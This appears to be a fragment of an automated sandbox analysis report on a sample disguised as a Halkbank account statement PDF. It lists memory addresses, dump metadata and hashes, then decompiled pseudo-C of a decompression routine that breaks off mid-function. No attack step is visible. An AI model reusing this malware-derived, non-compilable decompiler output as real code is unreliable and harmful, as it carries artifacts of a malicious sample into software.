                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00407447
                                          0x004074c7
                                          0x00407490

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                          • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                          • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                          • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
